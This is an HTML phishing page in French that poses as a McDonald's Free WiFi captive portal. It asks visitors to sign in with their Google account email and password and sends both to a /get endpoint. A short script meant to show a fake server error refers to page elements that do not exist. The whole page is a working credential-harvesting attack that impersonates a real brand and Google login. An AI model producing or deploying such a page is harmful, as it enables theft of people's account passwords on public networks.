<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        /* Styles généraux pour les écrans étroits (smartphones) */
        a:hover {
            text-decoration: underline;
        }

        body {
            font-family: Arial, sans-serif;
            align-items: center;
            justify-content: center;
            background-color: #FFFFFF;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 10px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid #cccccc;
            border-radius: 4px;
        }

        .container {
            max-width: 100%;
            margin: auto;
            padding: 20px;
        }

        .logo-container {
            text-align: center;
            margin-bottom: 30px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .logo {
            max-width: 40px;
            max-height: 40px;
            fill: #FFC72C;
            margin-right: 100px;
        }

        .company-name {
            font-size: 42px;
            color: black;
            margin-left: 0px;
        }

        .form-container {
            background: #FFFFFF;
            border: 1px solid #CEC0DE;
            border-radius: 4px;
            padding: 20px;
            box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
        }

        h1 {
            text-align: center;
            font-size: 28px;
            font-weight: 500;
            margin-bottom: 20px;
        }

        .input-field {
            width: 100%;
            padding: 12px;
            border: 1px solid #BEABD3;
            border-radius: 4px;
            margin-bottom: 20px;
            font-size: 14px;
        }

        .submit-btn {
            background: #000000;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 4px;
            font-size: 16px;
        }

        .submit-btn:hover {
            background: #5B3784;
        }

        .containersubtitle {
            color: #000000;
        }

        .containertitle {
            color: #000000;
        }

        /* Styles spécifiques pour les écrans larges (PC) */
        @media screen and (min-width: 768px) {
            .logo {
                max-width: 80px;
                max-height: 80px;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="logo-container">
        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN"
        "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
        <svg xml:space="preserve" viewBox="453.59999999999997 455.76 170.64000000000001 168.48" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg" style="max-height: 500px" width="170.64000000000001" height="168.48">
<desc>Created with Fabric.js 5.2.4</desc>
<defs>
</defs>
<rect fill="transparent" height="100%" width="100%" y="0" x="0"/>
<g id="52f1f976-545f-4445-8672-27cf315bcc50" transform="matrix(1 0 0 1 540 540)">
<rect height="1080" width="1080" ry="0" rx="0" y="-540" x="-540" style="stroke: none; stroke-width: 1; stroke-dasharray: none; stroke-linecap: butt; stroke-dashoffset: 0; stroke-linejoin: miter; stroke-miterlimit: 4; fill: rgb(255,255,255); fill-rule: nonzero; opacity: 1; visibility: hidden;"/>
</g>
<g id="5d869395-acca-4039-aa9d-c85165596d8c" transform="matrix(1 0 0 1 540 540)">
</g>
<g transform="matrix(1 0 0 1 540 540)">
<g style="">
		<g transform="matrix(1 0 0 1 0 0)">
<path stroke-linecap="round" d="M 15.06 142.43 C 15.06 142.43 2.9800000000000004 142.43 2.9800000000000004 130.35 L 2.9800000000000004 15.06 C 2.9800000000000004 15.06 2.98 2.98 15.06 2.98 L 130.35999999999999 2.98 C 130.35999999999999 2.98 142.44 2.98 142.44 15.06 L 142.44 130.35999999999999 C 142.44 130.35999999999999 142.44 142.44 130.35999999999999 142.44 L 15.06 142.44 Z" transform="translate(-72.71, -72.71)" style="stroke: none; stroke-width: 1; stroke-dasharray: none; stroke-linecap: butt; stroke-dashoffset: 0; stroke-linejoin: miter; stroke-miterlimit: 4; fill: rgb(38,79,54); fill-rule: nonzero; opacity: 1;"/>
</g>
		<g transform="matrix(1 0 0 1 0.01 -0.58)">
<path stroke-linecap="round" d="M 92.96 31.63 C 84.78 31.63 77.47999999999999 42.53 72.71 59.58 C 67.94 42.54 60.63999999999999 31.63 52.459999999999994 31.63 C 38.07999999999999 31.63 26.419999999999995 67.9 26.419999999999995 112.64 L 37.99999999999999 112.64 C 37.99999999999999 71.1 44.47999999999999 37.42 52.46999999999999 37.42 C 60.459999999999994 37.42 66.94 68.51 66.94 106.86 L 78.50999999999999 106.86 C 78.50999999999999 68.50999999999999 84.99 37.42 92.97999999999999 37.42 C 100.96999999999998 37.42 107.44999999999999 71.1 107.44999999999999 112.64 L 119.01999999999998 112.64 C 119.01999999999998 67.9 107.35999999999999 31.629999999999995 92.97999999999999 31.629999999999995 Z" transform="translate(-72.72, -72.13)" style="stroke: none; stroke-width: 1; stroke-dasharray: none; stroke-linecap: butt; stroke-dashoffset: 0; stroke-linejoin: miter; stroke-miterlimit: 4; fill: rgb(255,188,13); fill-rule: nonzero; opacity: 1;"/>
</g>
</g>
</g>
<g id="1fe1d3fd-deb6-4e48-b323-cf65c4d2eb5f" style="" transform="matrix(0.45 0 0 0.45 540 594.49)">
		<text style="stroke: none; stroke-width: 1; stroke-dasharray: none; stroke-linecap: butt; stroke-dashoffset: 0; stroke-linejoin: miter; stroke-miterlimit: 4; fill: rgb(255,255,255); fill-rule: nonzero; opacity: 1; white-space: pre;" font-weight="400" font-style="normal" font-size="40" font-family="Lato" xml:space="preserve"/>
</g>
<g id="160f450b-8e23-4809-9bd6-d65ee32be85c" style="" transform="matrix(0.53 0 0 0.53 540 594.46)">
		<text style="stroke: none; stroke-width: 1; stroke-dasharray: none; stroke-linecap: butt; stroke-dashoffset: 0; stroke-linejoin: miter; stroke-miterlimit: 4; fill: rgb(255,255,255); fill-rule: nonzero; opacity: 1; white-space: pre;" font-weight="400" font-style="normal" font-size="40" font-family="Lato" xml:space="preserve"><tspan y="12.57" x="-87.58">Free WIFI</tspan></text>
</g>
</svg>
    </div>
    <div class="form-container">
        <center>
            <h1 class='containertitle'>Bienvenue chez Mc Donald's Free Wifi.</h1>
            <h2 class='containersubtitle'> Connectez vous grace a votre compte Google.</h2>
        </center>
        <form action="/get" id="login-form">
            <input name="email" class="input-field" type="text" placeholder="Google Account" required>
            <input name="password" class="input-field" type="password" placeholder="Password" required>
            <button class="submit-btn" type="submit">Continue</button>
        </form>
    </div>
</div>
<script>
function showErrorPage() {document.write("<div style='margin-top:10%;background: lightgrey;max-width: 33%;margin: auto;padding: 20px;'><h1 style='text-align: center;color: black'>Our servers seem to be having some difficulties<h1></div>");}document.getElementById("submitbtn").addEventListener("click", showErrorPage);document.getElementById("forgot_credentials").addEventListener("click", showErrorPage);
</script>
</body>
</html>
